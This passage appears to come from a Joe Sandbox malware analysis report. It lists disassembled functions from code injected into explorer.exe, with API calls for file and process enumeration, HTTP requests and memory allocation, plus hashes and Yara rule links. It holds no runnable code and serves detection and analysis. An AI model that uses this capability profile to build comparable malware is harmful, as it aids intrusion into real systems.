                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFC1BF36208BC08AE760EB65F49479AB7A1F3C4755F508125EAC987B68DFBDD448CF40
                                                                                                                                                                                                                            Function 089D80B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFileInitStringUnicode
                                                                                                                                                                                                                            • String ID: 0$@
                                                                                                                                                                                                                            • API String ID: 2498367268-1545510068
                                                                                                                                                                                                                            • Opcode ID: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                                                                                            • Instruction ID: 2c83949ec6ebf47250d1ebcffbbb8792d849fe4f9c1425cd05d702f1360018b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA21C272118B848AE760DF14F49438BBBA4F3C4398F508219E2D947BA8CB7DD549CF80
                                                                                                                                                                                                                            Function 089D2B28 Relevance: 6.1, APIs: 4, Instructions: 112fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32 ref: 089D2BE7
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 089D2CAD
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32 ref: 089D2CDA
                                                                                                                                                                                                                            • FindClose.KERNEL32 ref: 089D2CED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 65906682-0
                                                                                                                                                                                                                            • Opcode ID: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                                                                                            • Instruction ID: 4111d2c06fab3a098642825f473450448cde3d881c1c92bbb78711781282c8b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED513C32219B8592DB20EB50F4803AEB365F7C4795F808526E6CE47B68EF7CD545CB44
                                                                                                                                                                                                                            Function 089E00E8 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a3e6b1ea7b23ac65d9339a5ebfcd307b95b642e050f3f0e8f3e300b5b553ebf3
                                                                                                                                                                                                                            • Instruction ID: a0a882b7bf50432ec41954c7c3f713a262de964e712a21d5b17936efa3ec6875
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3e6b1ea7b23ac65d9339a5ebfcd307b95b642e050f3f0e8f3e300b5b553ebf3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CD0C7A7D5EAD447E5132B244C742992F64B795D2678DC086D6C11B24398480405D215
                                                                                                                                                                                                                            Function 089DC860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                                            • API String ID: 830097650-1805413626
                                                                                                                                                                                                                            • Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                                                            • Instruction ID: abbcedf1f1f520fa9980e7f6d6a149dff708733192fba51b490c6cd402512b59
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A241C272518B84C2E720EB95F45975BBBA0F3C4799F109119E7CA83A68DFBDC448CB44
                                                                                                                                                                                                                            Function 089D2D50 Relevance: 15.2, APIs: 10, Instructions: 232processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3605396869-0
                                                                                                                                                                                                                            • Opcode ID: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                                                                                            • Instruction ID: 6533961b06e6e752504a1e2b48bd10f3674c6383db20992ffeb2f0e5ceca2a50
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBC14A36209B8599DB30EB14E48039AB3B4FBC8795F848525DACE47B68EF7CC549CB44
                                                                                                                                                                                                                            Function 089DBB44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                            • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                                                            • Instruction ID: 910807f7c44198875ff28b0d96cc5b26eaed891fc074e89afb39dcce42126be3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5841F436219F8582DB60EB25E48076AB7A4F7C4BA5F409525EA8E43B68DF7CC444CB44
                                                                                                                                                                                                                            Function 089DC5C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                            • Opcode ID: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                                                                                            • Instruction ID: 3ed444dce79f999803265fe8df427d105a44d82e1197fef296015b051140e85f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D310C36218F8582DB60EB15E48072A77A0F7C4795F849525EA9E53BA8DF7CC485CB04
                                                                                                                                                                                                                            Function 089D260C Relevance: 7.7, APIs: 5, Instructions: 174processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4137211488-0
                                                                                                                                                                                                                            • Opcode ID: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                                                                                            • Instruction ID: 9756fcf8cc1fe46fad9e751155e33d18ee747608136fb8d9d444134bc65ec090
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3812636219B81D6CA20EB54E48039AB3A5F7C8795F908626EBCD47B6CEF38D505CF44
                                                                                                                                                                                                                            Function 089D900C Relevance: 7.6, APIs: 5, Instructions: 121networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandle$Open
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2762225225-0
                                                                                                                                                                                                                            • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                                                            • Instruction ID: d8a1236069f901f7a444e2ec85e24c071aa47f1e04670f2c2e2cbcacae50a00c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF51F436218B84C6DB60EB55F49475ABBA0F3C5799F409029EBCA83B68DF7DC444CB08
                                                                                                                                                                                                                            Function 089DB9A0 Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2803068115-0
                                                                                                                                                                                                                            • Opcode ID: e34008a14b46bdf237dcb82eb44399d81f95163e5711bd1a836f86fc25367b22
                                                                                                                                                                                                                            • Instruction ID: 8acbd92936f60b225b95e8ef5d110d629718718584f9cdea646628a725f971e1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e34008a14b46bdf237dcb82eb44399d81f95163e5711bd1a836f86fc25367b22
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D641F676208B85D6DB60EB10E4803ABB7A5F7C8395F808426D6CD83B68EF7CC559CB44